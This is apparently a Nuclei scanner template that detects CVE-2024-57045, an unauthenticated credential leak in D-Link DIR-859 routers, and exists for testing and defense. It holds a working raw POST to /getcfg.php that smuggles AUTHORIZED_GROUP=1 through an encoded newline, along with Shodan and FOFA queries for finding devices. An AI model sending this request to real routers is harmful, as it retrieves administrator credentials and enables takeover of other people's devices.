id: CVE-2024-57045

info:
  name: D-Link DIR-859 - Information Disclosure
  author: ritikchaddha
  severity: critical
  description: |
    A critical information disclosure vulnerability exists in D-Link devices where sensitive device account information including credentials can be retrieved by sending an unauthenticated request to `/getcfg.php` endpoint with the parameter `SERVICES=DEVICE.ACCOUNT`. This could allow attackers to obtain administrative credentials and gain full control of the affected device.
  impact: |
    Unauthenticated attackers can retrieve administrative credentials and sensitive device account information, enabling full device compromise.
  remediation: |
    Update D-Link DIR-859 router to the latest firmware version that addresses CVE-2024-57045 as specified in D-Link's security bulletin.
  reference:
    - https://www.dlink.com/en/security-bulletin
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57045
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-57045
    cwe-id: CWE-200
    epss-score: 0.6676
    epss-percentile: 0.98572
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"D-Link"
    fofa-query: title="D-Link"
    vendor: D-Link
  tags: cve,cve2024,dlink,disclosure,unauth,vuln


http:
  - raw:
      - |
        POST /getcfg.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<name>"
          - "<password>"
          - "<account>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100960b6cd483767700a0d748d2fb33b6070d0688f024ebd6a626837b5f853ed129022100bedc173ebac060abfcd61f4ea17e43092f9c6a017ab386dd146829a88ec76cd3:922c64590222798bb761d5b6d8e72950